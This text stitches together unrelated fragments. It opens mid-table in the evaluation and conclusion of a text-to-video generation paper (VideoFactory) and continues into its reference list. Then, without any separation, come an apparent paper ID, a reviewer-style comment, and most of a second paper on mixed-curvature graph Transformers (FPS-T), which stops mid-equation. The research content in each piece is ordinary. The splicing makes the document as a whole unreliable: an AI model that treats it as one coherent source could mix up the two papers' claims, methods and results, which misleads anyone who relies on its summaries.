| 0.8875 | 0.8575 | 0.9300 | | | LVDM [He et al., 2022b] | 0.57× | 0.9155 | 0.8555 | 0.9370 | | Open Website | Make-A-Video [Singer et al., 2022] | 4.76× | 0.5417 | 0.4958 | 0.5417 | | | Imagen Video [Ho et al., 2022a] | 7.97× | 0.4291 | 0.2582 | 0.3818 | 5.3 Quantitative and Qualitative Comparison To thoroughly evaluate the generation performance of our VideoFactory, we benchmark it on three distinct datasets: WebVid-10M (Bain et al., 2021) (Val) same as the domain of part of our training data, along with UCF101 (Soomro et al., 2012) and MSR-VTT (Xu et al., 2016) in zero-shot setting. Evaluation on UCF101. As mentioned in Sec. 3, the textual annotations in UCF101 are class labels. We first follow (Ho et al., 2022b; Singer et al., 2022) and rewrite the labels of 101 classes to descriptive captions, and then generate 100 samples for each class. As shown in Tab. 4, the FVD of our methods reaches 410.0, which achieves the best compared with other methods both in zero-shot setting and beats most of the methods which have tuned on UCF101. The results verify that our proposed VideoFactory could generate more coherent and realistic videos. Evaluation on MSR-VTT. As shown in Tab. 5, we also evaluate the CLIPSIM on the widely used video generation benchmark MSR-VTT. We randomly choose one prompt per example from MSR-VTT to generate 2990 videos in total. Although in a zero-shot setting, our method achieves the best compared to other methods with an average CLIPSIM score of 0.3005, which suggests the semantic alignment between the generated videos and the input text. Evaluation on WebVid-10M (Val). Referring to Tab. 6, we randomly extract 5K text-video pairs from WebVid-10M which are exclusive from the training data to form a validation set and conduct evaluations on it. Our approach achieves an FVD of 292.35 and a CLIPSIM of 0.3070, outperforming existing methods and showcasing the superiority of our approach. Human Evaluation. To assess our VideoFactory from the aspect of humans, we conducted a user study comparing it with four state-of-the-art models. Specifically, we selected two models, ModelScope and LVDM, for which codes and pretrained models were available, and two methods, Make-A-Video and Imagen Video, which only show some samples on their websites. In each case, participants were presented with two samples generated by our method and the competitor. They were then asked to evaluate the video quality, text-video correlation, and express an overall preference. The results are summarized in Tab. 7. Additionally, we provide the parameter ratios for fair comparisons. Subjective Results. In Fig. 7, we show comparison results against Make-A-Video, Imagen Video, and Video LDM. The prompts and generated results are collected from their official project website. We also evaluate Gen-2 (Runway), a popular platform in the AIGC field. Make-A-Video only generates 1:1 videos, which limits the user experience. When compared with Imagen Video and Video LDM, our model generates the panda and golden retriever with more vivid details. Despite setting the motion intensity parameter to the maximum, Gen-2 cannot simulate the splashing motion of water. Furthermore, we showcase additional samples of our model in Fig. 8 and Sec. E.4 in the appendix. Video demos can be found in our supplementary. Due to space constraints, please refer to Sec. E.3 for failure case study. 6 CONCLUSION In this paper, we introduce VideoFactory, a high-quality open-domain video generation framework that produces watermark-free, high-definition (1376×768), widescreen (16:9) videos. We enhance spatial and temporal modeling using a novel swapped cross-attention mechanism, allowing spatial and temporal information to complement each other effectively. Additionally, we provide the HD-VG-130M dataset, featuring 130 million open-domain text-video pairs in widescreen, watermark-free, high-definition format, maximizing the potential of our model. Experimental results demonstrate that VideoFactory generates videos with superior spatial quality, temporal consistency, and alignment with text, establishing it as the new benchmark for text-to-video generation. REFERENCES Jie An, Songyang Zhang, Harry Yang, Sonal Gupta, Jia-Bin Huang, Jiebo Luo, and Xi Yin. Latent-Shift: Latent diffusion with temporal shift for efficient text-to-video generation. arXiv, 2023. Max Bain, Arsha Nagrani, Gül Varol, and Andrew Zisserman. Frozen in time: A joint video and image encoder for end-to-end retrieval. In ICCV, 2021. Yogesh Balaji, Seungjun Nah, Xun Huang, Arash Vahdat, Jiaming Song, Karsten Kreis, Miika Aittala, Timo Aila, Samuli Laine, Bryan Catanzaro, Tero Karras, and Ming-Yu Liu. eDiff-I: Text-to-image diffusion models with an ensemble of expert denoisers. arXiv, 2022. Gedas Bertasius, Heng Wang, and Lorenzo Torresani. Is space-time attention all you need for video understanding? In Marina Meila and Tong Zhang (eds.), ICML, 2021. Andreas Blattmann, Robin Rombach, Huan Ling, Tim Dockhorn, Seung Wook Kim, Sanja Fidler, and Karsten Kreis. Align your latents: High-resolution video synthesis with latent diffusion models. In CVPR, 2023. Breakthrough. PySceneDetect: Video scene cut detection and analysis tool. https://github.com/Breakthrough/PySceneDetect Prafulla Dhariwal and Alexander Nichol. Diffusion models beat GANs on image synthesis. In NeurIPS, 2021. Ming Ding, Zhuoyi Yang, Wenyi Hong, Wendi Zheng, Chang Zhou, Da Yin, Junyang Lin, Xu Zou, Zhou Shao, Hongxia Yang, and Jie Tang. CogView: Mastering text-to-image generation via transformers. In NeurIPS, 2021. Ming Ding, Wendi Zheng, Wenyi Hong, and Jie Tang. CogView2: Faster and better text-to-image generation via hierarchical transformers. In NeurIPS, 2022. Patrick Esser, Johnathan Chiu, Parmida Atighehchian, Jonathan Granskog, and Anastasis Germanidis. Structure and content-guided video synthesis with diffusion models. arXiv, 2023. Ian J. Goodfellow, Jean Pouget-Abadie, Mehdi Mirza, Bing Xu, David Warde-Farley, Sherjil Ozair, Aaron C. Courville, and Yoshua Bengio. Generative adversarial nets. In NeurIPS, 2014. Bohai Gu, Heng Fan, and Libo Zhang. Two birds, one stone: A unified framework for joint learning of image and video style transfers. In ICCV, 2023. AmirHossein Habibian, Ties van Rozendaal, Jakub M. Tomczak, and Taco Cohen. Video compression with rate-distortion autoencoders. In ICCV, 2019. Yingqing He, Tianyu Yang, Yong Zhang, Ying Shan, and Qifeng Chen. Latent video diffusion models for high-fidelity video generation with arbitrary lengths. arXiv, 2022a. Yingqing He, Tianyu Yang, Yong Zhang, Ying Shan, and Qifeng Chen. Latent video diffusion models for high-fidelity long video generation. arXiv, 2022b. Jonathan Ho and Tim Salimans. Classifier-free diffusion guidance. arXiv, 2022. Jonathan Ho, Ajay Jain, and Pieter Abbeel. Denoising diffusion probabilistic models. NeurIPS, 33: 6840–6851, 2020. Jonathan Ho, William Chan, Chitwan Saharia, Jay Whang, Ruqi Gao, Alexey A. Gritsenko, Diederik P. Kingma, Ben Poole, Mohammad Norouzi, David J. Fleet, and Tim Salimans. Imagen Video: High definition video generation with diffusion models. arXiv, 2022a. Jonathan Ho, Tim Salimans, Alexey A. Gritsenko, William Chan, Mohammad Norouzi, and David J. Fleet. Video diffusion models. In NeurIPS, 2022b. Wenyi Hong, Ming Ding, Wendi Zheng, Xinghan Liu, and Jie Tang. CogVideo: Large-scale pretraining for text-to-video generation via transformers. arXiv, 2022.
AN5uo4ByWH
There are no significant theoretical analysis that would provide insights on specific features of FPS-T: e.g when graphs whose sectional curvature distribution has a large variance what would be a good constant curvature space (or product of spaces) to discriminate them ?
Curve Your Attention: Mixed-Curvature Transformers for Graph Representation Learning Anonymous authors Paper under double-blind review Abstract Real-world graphs naturally exhibit hierarchical trees and cyclic structures that are unfit for the typical Euclidean space. While there exist graph neural networks that utilize hyperbolic or spherical spaces towards embedding such structures more accurately, these methods are confined under the message-passing paradigm, making them vulnerable against side-effects such as oversmoothing and oversquashing. More recent work have proposed global attention-based graph Transformers that can alleviate such drawbacks and easily model long-range interactions, but their extensions towards non-Euclidean geometry are yet unexplored. To bridge this gap, we propose Fully Product-Stereographic Transformer, a generalization of Transformers towards operating entirely on the product of constant curvature spaces. When combined with tokenized graph Transformers, our model can learn the curvature appropriate for the input graph in an end-to-end fashion, without any additional tuning on different curvature initializations. We also provide a kernelized approach to non-Euclidean attention, which enables our model to run with computational cost linear to the number of nodes and edges while respecting the underlying geometry. Experiments on graph reconstruction and node classification demonstrate the benefits of generalizing Transformers to the non-Euclidean domain. 1 Introduction Learning from graph-structured data is a challenging task in machine learning, with various downstream applications that involve modeling individual entities and relational interactions among them (Sen et al., 2008; Watts & Strogatz, 1998; Gleich et al., 2004). A dominant line of work consists of graph convolutional networks (GCNs) that aggregate features across graph neighbors through message-passing (Gilmer et al., 2017; Kipf & Welling, 2016; Veličković et al., 2017; Wu et al., 2019; Hamilton et al., 2017). While most GCNs learn features that lie on the typical Euclidean space with zero curvature, real-world graphs often comprise of complex structures such as hierarchical trees and cycles that Euclidean space requires excessive dimensions to accurately embed (Sala et al., 2018). In response, the graph learning community has developed generalizations of GCNs to spaces with non-zero curvature such as hyperbolic, spherical, or mixed-curvature spaces with both negative and positive curvatures (Chami et al., 2019; Liu et al., 2019; Bachmann et al., 2020; Xiong et al., 2022). Unfortunately, non-Euclidean GCNs are not immune to harmful side-effects of message-passing such as oversmoothing (Oono & Suzuki, 2019; Cai & Wang, 2020; Yang et al., 2022) and oversquashing (Topping et al., 2021; Alon & Yahav, 2020). These drawbacks make it difficult to stack GCN layers towards large depths, limiting its expressive power (Feng et al., 2022; Maron et al., 2019) as well as predictive performance on tasks that require long-range interactions to solve (Dwivedi et al., 2022; Liu et al., 2021). To cope with such limitations, recent work have instead proposed Transformer-based graph encoders that can easily exchange information across long-range distances through global self-attention (Kim et al., 2022; Ying et al., 2021; Dwivedi & Bresson, 2020; Kreuzer et al., 2021). However, existing graph Transformers are still confined within the Euclidean regime, and their extensions towards non-Euclidean geometry has not yet been studied. In this paper, we bridge this gap by generalizing the Transformer architecture (Vaswani et al., 2017) towards non-Euclidean spaces with learnable curvatures. Specifically, we endow each attention head a stereographic model (Bachmann et al., 2020) that can universally represent Euclidean, hyperbolic, and Figure 1: Illustration of our proposed FPS-T architecture. Well-known constant curvature spaces can be projected to the stereographic model, with a common chart map isomorphic to the $d$-dimensional Euclidean space. Each space can efficiently embed different types of graphs (e.g., trees in hyperbolic space, lines in Euclidean space, and cycles in spherical space). In FPS-T, each layer chooses a set of curvatures that fits the input graph by changing the sign of the curvature $\kappa$ in a differentiable manner. We generalize each operation of the Transformer architecture to inputs on the product-stereographic model, all of which are end-to-end differentiable with respect to the curvatures, thereby allowing the model to jointly train embeddings as well as the underlying curvature. The resulting model, which we name as Fully Product-Stereographic Transformer (FPS-T), takes advantage of both non-Euclidean geometry and long-range interactions. We empirically show that the learnable sectional curvature of FPS-T successfully converges to the geometry of the input graph, leading to better predictive performance and parameter efficiency in graph reconstruction and node classification compared to its Euclidean counterpart. To the best of our knowledge, our work is the first to propose a natural generalization of Transformers to mixed-curvature spaces. We summarize our core contributions as follows: - We propose FPS-T, a generalization of Transformer towards operating entirely on the product-stereographic model with curvatures that are learnable in an end-to-end fashion. - For graph representation learning, we integrate FPS-T with Tokenized Graph Transformer (Kim et al., 2022), and develop a kernelized approximation of non-Euclidean attention to reduce the computational cost to linear in number of nodes and edges. - Graph reconstruction and node classification experiments on synthetic as well as real-world graphs demonstrate the benefit of generalizing Transformers to the mixed-curvature domain. 2 RELATED WORK Non-Euclidean graph representations. Non-Euclidean spaces are known to well-preserve specific types of graph structure where Euclidean space fails. Especially, non-Euclidean spaces with constant sectional curvature, e.g., hyperbolic and spherical spaces, are widely used in graph representation learning due to its tractable operations. Hyperbolic spaces are capable of efficiently embedding complex hierarchical structures in graphs (Nickel & Kiela, 2018; 2017; Ganea et al., 2018; Krioukov et al., 2010; Sala et al., 2018). Graphs with cyclic structures are well-suited for spherical spaces (Wilson et al., 2014; Grattarola et al., 2019). Riemannian manifolds with varying curvature and constant sign are also proposed for graph encoding (Cruceru et al., 2021). However, Riemannian manifolds where the sign of the curvature is fixed are not a good choice for more complex graphs that exhibit both hierarchy and cycles. Instead, the product of constant-curvature spaces (Gu et al., 2019), heterogeneous manifolds (Giovanni et al., 2022), and pseudo-Riemannian manifolds (Law & Stam, 2020) are found to be well-suited for learning representations of such complex graphs. Message passing GCNs also benefit from considering a non-Euclidean representation space. Hyperbolic GCNs are known to outperform Euclidean counterparts in various tasks on hierarchical graphs such as citation networks (Chami et al., 2019; Zhang et al., 2021; Pei et al., 2020) and molecules (Chami et al., 2019; Liu et al., 2019). Deepsphere (Defferrard et al., 2020) also adopted the spherical space to GCNs with applications such as 3D object and earth climate modeling. To take the advantage of multiple spaces, (Zhu et al., 2020b) proposed a hybrid architecture that fuses Euclidean and hyperbolic graph representations together. (Deng et al., 2023) similarly proposed modeling interactions between three constant-curvature spaces (i.e., Euclidean, hyperbolic, and spherical). To allow smooth connections between the three constant-curvature spaces, (Bachmann et al., 2020) proposed a model of constant-curvature space called the stereographic model, on which geometric operations such as distances and inner products are differentiable at all curvature values including zero. Incorporating pseudo-Riemannian manifolds with the GCN architecture also showed promising results (Xiong et al., 2022), but its performance is sensitive to the time dimension of the manifold, which requires extensive hyperparameter tuning. Overall, GCNs achieve great predictive performance in homophilic graphs where connected nodes share the same features, but they tend to fail in heterophilic graphs, as stacking up GCN layers to capture message passing between distant nodes induces oversmoothing (Oono & Suzuki, 2019; Cai & Wang, 2020) and oversquashing (Topping et al., 2021). To relieve this architectural limitation while utilizing non-Euclidean geometrical priors, we instead develop a Transformer-based graph encoder that operates on the stereographic model to learn graph representations. **Graph Transformers.** Inspired by huge success of Transformers in NLP and CV (Devlin et al., 2018; Brown et al., 2020; Dosovitskiy et al., 2020), there exist various work that extend Transformers for encoding graphs with edge connectivities that are neither sequential nor grid-like. Graph Transformer (Dwivedi & Bresson, 2020) and Spectral Attention Network (Kreuzer et al., 2021) were the first pioneers to explore this direction by replacing sinusoidal positional encodings widely used in NLP with Laplacian eigenvectors of the input graph. Graphormer (Ying et al., 2021) then proposed utilizing edge connectivities by using shortest-path distances as an attention-bias, showing state-of-the-art performance on molecular property prediction. TokenGT (Kim et al., 2022) proposed a tokenization technique that views each graph as a sequence of nodes and edges. Unlike other methods, TokenGT allows straightforward integration of engineering techniques of pure Transformers such as linearized attention (Katharopoulos et al., 2020), while enjoying theoretical expressivity that surpasses that of message-passing GCNs. However, existing graph Transformer architectures are yet confined within the Euclidean domain, making them unable to precisely embed graphs onto the feature space similarly to geometric GCNs. While Hyperbolic Attention Network (Gulcehre et al., 2018) proposed an attention mechanism that operates on hyperbolic space, its distance-based approach imposes a computational cost quadratic to the graph size and its geometry is fixed to hyperbolic. Instead, we generalize the representation space of Transformer to stereographic model, which allows us to cover more various types of graphs. We also linearize the attention mechanism on the stereographic model similar to Katharopoulos et al. (2020), which results in a model that runs in cost linear to the number of nodes and edges. ### 3 Preliminaries In this section, we introduce concepts related to our main geometrical tool, the product-stereographic model (Bachmann et al., 2020). We also discuss multi-head attention, the driving force of the Transformer architecture (Vaswani et al., 2017). #### 3.1 Product-Stereographic Model **Riemannian manifolds.** A Riemannian manifold is consisted of a smooth manifold \( M \) and a metric tensor \( g \). Each point \( x \) on the manifold \( M \) defines a tangent space \( T_xM \), which is a collection of all vectors that are tangent to \( x \), also called the tangent vector. The metric tensor \( g : M \rightarrow \mathbb{R}^{n \times n} \) assigns a positive-definite matrix to each point \( x \), which defines its inner product \( \langle \cdot , \cdot \rangle_x : T_xM \times T_xM \rightarrow \mathbb{R} \) as \( v_1^T g(x) v_2 \) where \( v_1, v_2 \in T_xM \) are the tangent vectors of \( x \). The metric tensor also defines geometrical properties and operations on the Riemannian manifold. Geodesic \( \gamma \) is the shortest curve between two points \( x, y \in M \) and its distance can be computed as \( d_M(x, y) = \int_0^1 \langle \dot{\gamma}(t), \dot{\gamma}(t) \rangle_{\gamma(t)} dt \), where \( \gamma : [0, 1] \rightarrow M \) is a unit-speed curve satisfying \( \gamma(0) = x \) and \( \gamma(1) = y \). We can move the point \( x \in M \) along a tangent vector \( v \in T_xM \) using exponential map \( \exp_x : T_xM \rightarrow M \) which is defined as \( \exp_x(v) = \gamma(1) \) where \( \gamma \) is a geodesic and \( \gamma(0) = x, \gamma'(0) = v \). The logarithmic map \( \log_x : M \rightarrow T_xM \) is the inverse of \( \exp_x \). A tangent vector \( v \in T_xM \) can be transferred along a geodesic from \( x \) to \( y \) using parallel transport \( P_{T_xM \rightarrow T_yM} : T_xM \rightarrow T_yM \). Note that the product of Riemannian manifolds is also a Riemannian manifold. A point on the product Riemannian manifold \( x \in \otimes_{i=1}^{n} M_i \) is consisted of points from each component manifold \( M_i \) as \( x = \|_{i=1}^{n} x_i \), where \( x_i \in M_i \) and \( \| \) denotes concatenation. The distance between \( x, y \in \otimes_{i=1}^{n} M_i \) is calculated as \( \sqrt{\sum_{i=1}^{n} d_{M_i}(x_i, y_i)} \). Exponential/logarithmic maps and parallel transports are applied in a manifold-wise fashion (e.g., \( \exp_x(v) = \|_{i=1}^{n} \exp_{x_i}(v_i) \) with \( v = \|_{i=1}^{n} v_i \) and \( v_i \in T_{x_i} M_i \)). **Constant-curvature spaces.** Curvature is an important geometrical property used to characterize Riemannian manifolds. One widely-used curvature to explain Riemannian manifolds is the sectional curvature: given two linearly independent tangent vector fields \( U, V \in \mathfrak{X}(M) \), the sectional curvature \( K(U, V) \) is computed as \( K(U, V) = \frac{\langle R(U,V)V,U \rangle}{\langle U,U \rangle \langle V,V \rangle - \langle U,V \rangle^2} \), where \( R(\cdot, \cdot) : \mathfrak{X}(M) \times \mathfrak{X}(M) \times \mathfrak{X}(M) \to \mathfrak{X}(M) \) is a Riemannian curvature tensor. The sectional curvature measures the divergence between geodesics starting with the tangent vector fields \( U, V \) for each point of the manifold. With positive or negative sectional curvatures, geodesics become closer or farther than with zero curvature. Throughout this paper, we refer to a space of a constant sectional curvature as a **constant-curvature space**. For example, the Euclidean space \( \mathbb{E} \) is the special case of the constant-curvature space with zero curvature. When positive or negative, we call the corresponding spaces to be hyperbolic \( \mathbb{H} \) or spherical \( \mathbb{S} \). **Stereographic models.** A \( d \)-dimensional stereographic model \( \text{st}_d^\kappa \) is a constant-curvature space with curvature \( \kappa \in \mathbb{R} \). One attractive property of the stereographic model is that the operations such as distance, exp/log-map, and parallel transport are differentiable at any curvature value \( \kappa \), including \( \kappa = 0 \). This enables the stereographic model to learn the curvature value \( \kappa \) without any constraint. The manifold of the stereographic model \( \text{st}_d^\kappa \) is \( \{ x \in \mathbb{R}^d | -\kappa \|x\|^2 < 1 \} \). The metric tensor is defined as \( g^\kappa(x) = \frac{4}{1 + \kappa \|x\|^2} I = (\lambda_\kappa^x)^2 I \), where \( \lambda_\kappa^x \) is known as the conformal factor. The mobius addition between two points \( x, y \in \text{st}_d^\kappa \) is computed as \( x \oplus_\kappa y = \frac{(1-2\kappa x^T y-\kappa \|y\|^2)x+(1+\kappa \|x\|^2)y}{1-2\kappa x^T y+\kappa^2 \|x\|^2 \|y\|^2} \). Based on mobius addition, we can derive other geometric operations as Table 3 in Appendix A. The table also shows that when \( \kappa \) converges to zero, the operations become equivalent to Euclidean space operations, so the stereographic model essentially recovers Euclidean geometry. ### 3.2 Multi-Head Attention In vanilla Transformer (Vaswani et al., 2017), each block consists of multiple attention heads, each taking a sequence of token embeddings \( X \in \mathbb{R}^{n \times d} \) with sequence length \( n \) and feature dimension \( d \) as input. Three linear layers \( W^Q, W^K, W^V \in \mathbb{R}^{d \times d'} \) first map each token embedding into queries \( Q \), keys \( K \), and values \( V \) with head-dimension \( d' \), respectively. Then, the attention score matrix is computed by scaled Euclidean dot-product between \( Q \) and \( K \), followed by row-wise softmax activation \( \sigma(\cdot) \). The attention score matrix is then multiplied to value \( V \), returning contextualized token embeddings. The overall procedure can be written as \[ Q = XW^Q, \quad K = XW^K, \quad V = XW^V, \quad \text{Attn}(X) = \sigma \left( \frac{QK^T}{\sqrt{d'}} \right) V. \tag{1} \] The output from multiple attention heads are concatenated together, then processed through a feed-forward layer before proceeding to the next Transformer block. ### 4 Fully Product-Stereographic Transformer Here, we describe the inner wirings of our proposed method. We generalize each operation in Transformer to the product-stereographic model, together forming a geometric Transformer architecture that operates entirely within the stereographic model. #### 4.1 Stereographic Neural Networks We first introduce the stereographic analogies of the Euclidean neural networks such as the linear layer, activation, layer normalization, and logit functions. We denote the product-stereographic model \( \otimes_{i=1}^{H} \text{st}_{d_i}^{\kappa_i} \) as \( \text{st}_d^{\otimes \kappa} \), where \( \kappa = (\kappa_1, \ldots, \kappa_H) \) is the ordered set of curvatures of \( d \)-dimensional component spaces within a Transformer block with \( H \) attention heads. We also use the superscript \( \otimes \kappa \) to denote Riemannian operations on product-stereographic model that decompose representations into equal parts, apply the operation, then concatenate back to the product space (e.g., if \( v = [v_1, \ldots, v_H] \), then \( \exp_0^{\otimes \kappa}(v) := \|_{i=1}^{H} \exp_0^{\kappa_i}(v_i) \)). Figure 2: Illustration of our attention mechanism on the non-Euclidean space. FPS-T considers each value-vector as a point that resides on the stereographic model, and query/key-vectors as tangent vectors on the corresponding tangent spaces. All query/key-vectors are parallel-transported to the origin prior to dot-product attention, thereby taking the given geometry into account. **Stereographic linear layer, activation, and layer normalization.** Given a Euclidean neural network \( f \), we can define its stereographic counterpart as \( \exp_{\kappa}^{\otimes} (f(\log_{\kappa}^{\otimes}(X))) \). The stereographic linear layer \( \text{Linear}_{\kappa}(X; W) \) is thus defined by setting \( f \) as the Euclidean linear layer \( f(X; W) = XW \). The same approach can be used for any Euclidean activation function \( f_{\text{act}} \) (e.g., ReLU, Tanh, ELU, and Sigmoid), from which we obtain stereographic activation functions. Stereographic layer normalization \( \text{LN}_{\kappa} \) is defined in the same manner. **Stereographic logits.** Suppose that \( x \in \mathfrak{st}_d^\kappa \) is a stereographic embedding retrieved from the last transformer layer. For prediction tasks such as node classification, we need to compute the probability that the node with embedding \( x \) belongs to class \( c \). Inspired by logistic regression in Euclidean spaces, Bachmann et al. (2020) proposes its stereographic variant as \[ p(y = c | x) \propto \exp \left( \text{sign}(\langle -p_c \oplus_\kappa x, a_c \rangle) \|a_c\|_p d_\kappa(x, H_{a_c, p_c}) \right), \] where \( H_{a_c, p_c} = \{ x \in \mathfrak{st}_d^\kappa | \langle -p_c \oplus_\kappa x, a_c \rangle = 0 \} \) is a hyperplane formed by \( a_c \in T_p \mathfrak{st}_d^\kappa \) and \( p_c \in \mathfrak{st}_d^\kappa \). For stereographic model \( \mathfrak{st}_d^\kappa \), the distance between \( x \in \mathfrak{st}_d^\kappa \) and hyperplane \( H_{a, p} \) equals \[ d_\kappa(x, H_{a, p}) = \sin^{-1}_\kappa \left( \frac{2|\langle -p \oplus_\kappa x, a \rangle|}{(1 + \kappa \|(-p \oplus_\kappa x, a)\|^2)\|a\|} \right). \] This distance function can be easily extended to the product-stereographic model as mentioned in Section 3.1, and parameters \( a, p \) that define the hyperplane are learnable during training. ### 4.2 STEREOGRAPHIC MULTI-HEAD ATTENTION Using the stereographic operations above, we propose a multi-head attention mechanism under product-stereographic models. The key intuition is that each \( h \)-th attention head operates on the \( \kappa_h \)-stereographic space. Given a sequence of \( n \) product-stereographic embeddings \( X \in \mathfrak{st}_n^\kappa \times d' \), the attention head with curvature \( \kappa \) first obtains values using the stereographic linear layer. For queries and keys, it maps each stereographic embedding to the tangent space of the values as: \[ Q = XW_Q \in T_V \mathfrak{st}_n^\kappa \times d', \quad K = XW_K \in T_V \mathfrak{st}_n^\kappa \times d', \quad V = \text{Linear}_\kappa(X; W_V) \in \mathfrak{st}_n^\kappa \times d', \] where \( W_Q, W_K \in \mathbb{R}^{d \times d'} \) are the query/key weight matrices, and \( W_V \in \mathbb{R}^{d \times d'} \) is the weight matrix for values. Then, the attention score between the \( i \)-th query \( Q_i \) and \( j \)-th key \( K_j \) is computed by parallel-transporting the vectors to the origin, and taking the inner product at the origin as \[ \alpha_{ij} = \langle \text{PT}_{V_i \to 0}(Q_i), \text{PT}_{V_j \to 0}(K_j) \rangle_0. \] Figure 2 illustrates our geometric attention mechanism. Because the metric tensor of the origin of the stereographic model is simply \( 4I \) with identity matrix \( I \), the Riemannian inner product becomes equivalent to the Euclidean inner product at the origin. Finally, we aggregate values based on the attention scores using the Einstein midpoint: \[ \text{Aggregate}_\kappa(V, \alpha)_i := \frac{1}{2} \otimes_\kappa \left( \sum_{j=1}^n \frac{\alpha_{ij} \lambda_{V_j}^\kappa}{\sum_{k=1}^n \alpha_{ik} (\lambda_{V_k}^\kappa - 1)} V_j \right), \] with conformal factor \( \lambda_{V_i}^\kappa \) at point \( V_i \in \mathfrak{st}_n^\kappa \). By concatenating the aggregated results from each attention head, the final outcome of product-stereographic multi-head attention is \[ \text{MHA}_{\otimes \kappa}(X) = [\otimes_{h=1}^H \text{Aggregate}_{\kappa_h}(V^h, \alpha^h)] \in \otimes_{h=1}^H \mathfrak{st}_n^\kappa \times d, \] where \( \kappa_h \) denotes the curvature of the \( h \)-th attention head. 4.3 Wrap-up For completeness, we fill in the gap on how intermediate steps such as skip-connection are generalized towards non-zero curvatures, and how representations are processed between Transformer layers with distinct curvatures. First, recall that vanilla Transformer utilizes residual connections and Layer normalization to mitigate vanishing gradients and induce better convergence (Vaswani et al., 2017). To apply these operations on representations in the product-stereographic space, we switch to \[ X_l = \text{MHA}_{\kappa}(\text{LN}_{\kappa}(X_{l}^{\text{in}})) \oplus_{\kappa} X_{l}^{\text{in}}, \quad X_{l}^{\text{out}} = \text{FFN}_{\kappa}(\text{LN}_{\kappa}(X_{l})) \oplus_{\kappa} X_{l}. \] (8) Note that while each attention head in stereographic multi-head attention operates on each stereographic model independently, the product-stereographic feed-forward network FFN$_{\kappa}$, for which we use two stereographic linear layers with an activation in between, fuses representations from distinct geometries and performs interactions between different stereographic models similarly to previous work (Zhu et al., 2020b; Deng et al., 2023). Furthermore, note that each $l$-th Transformer layer operates on a distinct product-stereographic space $\text{st}_{d \otimes \kappa^l}$ where $\kappa^l = (\kappa_1^l, \ldots, \kappa_H^l)$ together forms the geometric signature of the layer. For consistency, we assume that the input embeddings are on the product-stereographic model of the first layer (i.e., $\text{st}_{d \otimes \kappa^1}$). In case of classification tasks where logits are computed, the product-stereographic logit layer operates on the last set of curvatures (i.e., $\text{st}_{d \otimes \kappa^L}$ where $L$ denotes the number of Transformer layers). In between layers, representations are translated from $\text{st}_{d \otimes \kappa^l}$ to $\text{st}_{d \otimes \kappa^{l+1}}$ by assuming a shared tangent space at the origin (i.e., $X_{l+1}^{\text{in}} = (\exp_{0}^{\otimes \kappa^{l+1}} \circ \log_{0}^{\otimes \kappa^l})(X_{l}^{\text{out}})$). Altogether, it is straightforward to find that FPS-T becomes equivalent to the original Transformer as all $\kappa$ approaches 0, yet it possesses the capability to deviate itself away from Euclidean geometry given it leads to better optimization. For all experiments, we initialize all curvatures as zero to demonstrate the practicality of our method by not requiring additional hyperparameter tuning over different curvature combinations. 4.4 Extension to Graph Transformer To learn graph-structured data with FPS-T, we borrow the tokenization technique used by TOKENGT (Kim et al., 2022). Let $G = (V, E)$ be a graph with $N$ nodes in node-set $V$, $M$ edges in edge-set $E$, and respective features $X_V \in \mathbb{R}^{N \times d}$, $X_E \in \mathbb{R}^{M \times d}$. Then, we tokenize $G$ into a sequence $X = [X_V, X_E] \in \mathbb{R}^{(N+M) \times d}$ by treating each node and edge as an independent token, and augment the tokens with 1) node identifiers that serve as positional encoding and 2) type identifiers that allow the model to distinguish between node- and edge-tokens. TOKENGT feeds this sequence into vanilla Transformer, an approach proven to pass the 2-dimensional Weisfeiler-Lehman (2-WL) graph isomorphism test and surpass the theoretical expressivity of message-passing GNNs (Kim et al., 2022; Maron et al., 2019). More details on the tokenization procedure can be found in Appendix B. In our work, we encode the input sequence through FPS-T instead, such that nodes and edges exchange information globally on the product-stereographic space. As augmented feature vectors $X$ are initially Euclidean, we assume each token lies within the tangent space at the origin of the product-stereographic model of the first layer $T_0 \text{st}_{d \otimes \kappa^1} \cong \mathbb{R}^{H \times d}$, where $|\kappa^1| = H$ and $Hd = d$. Therefore, we apply exponential mapping on the tokens to place them on the product-stereographic model via $\exp_{0}^{\otimes \kappa^1}(X)$, the output of which is forwarded through FPS-T. 4.5 Cost Linearization of Stereographic Attention One drawback of the graph tokenization method above is that its computational cost becomes intractable when encoding large graphs. As computing the attention score matrix takes time and memory quadratic to the sequence length, a graph with $N$ nodes and $M$ edges incurs an asymptotic cost of $O((N + M)^2)$, which can be $O(N^4)$ for dense graphs. Fortunately, there exist various advancements used to make Transformers more efficient (Tay et al., 2022; Kitaev et al., 2020; Choromanski et al., 2020; Wang et al., 2020; Xiong et al., 2021; Cho et al., 2022). In linearized attention (Katharopoulos et al., 2020), it is shown that the Euclidean attention score $\langle Q_i, K_j \rangle$ can be approximated with the product of kernel function $\phi(Q_i)\phi(K_j)^T$, where $\phi(X) = \text{ELU}(X) + 1$. For stereographic attention (Equation 5), computing dot-products on the tangent space of the origin allows us to extend this kernelization to FPS-T. Let $\hat{Q}_i = \text{PT}_{V_i \rightarrow o}(Q_i)$ and $\hat{K}_j = \text{PT}_{V_j \rightarrow o}(K_j)$ be the tangent vectors on the origin prior to taking the dot-product. By applying Table 1: Synthetic graph reconstruction results in average distortion (lower is better). The best FPS-T configuration and its learned curvatures are well-aligned to the geometry of the input graph. | Model | Space | TREE | SPHERE | TORUS | RING OF TREES | |----------------|-------------|----------|----------|----------|---------------| | TOKENGT | $\mathbb{E}^{10}$ | 0.04363 | 0.04023 | 0.07172 | 0.05553 | | | $\mathbb{S}^5 \times \mathbb{E}^5$ | 0.04357 | 0.04139 | 0.07167 | 0.05546 | | FPS-T (ours) | $\mathfrak{s}\mathfrak{l}_{\kappa_1}^{10}$ | **0.00072** | **0.02176** | **0.06415** | **0.03393** | | | $\mathfrak{s}\mathfrak{l}_{\kappa_1}^5 \times \mathfrak{s}\mathfrak{l}_{\kappa_2}^5$ | 0.00105 | 0.02206 | **0.06135** | **0.01630** | | Best FPS-T curvatures | | (-1.219) | (+0.0629) | (+1.308, +0.2153) | (+0.3241, -3.314) | Figure 3: Illustration of geometric graphs used in our synthetic graph reconstruction experiment. (a) TREE (b) SPHERE (c) TORUS (d) RING OF TREES Kernelization to stereographic attention, we can rewrite the stereographic aggregation (Equation 6) as $$ \frac{1}{2} \otimes_{\kappa} \left( \sum_{j=1}^{n} \frac{\langle \tilde{Q}_i, \tilde{K}_j \rangle_0 \lambda_{V_j}^{\kappa}}{\sum_{k=1}^{n} \langle \tilde{Q}_i, \tilde{K}_k \rangle_0 (\lambda_{V_k}^{\kappa} - 1)} V_j \right) \approx \frac{1}{2} \otimes_{\kappa} \left[ 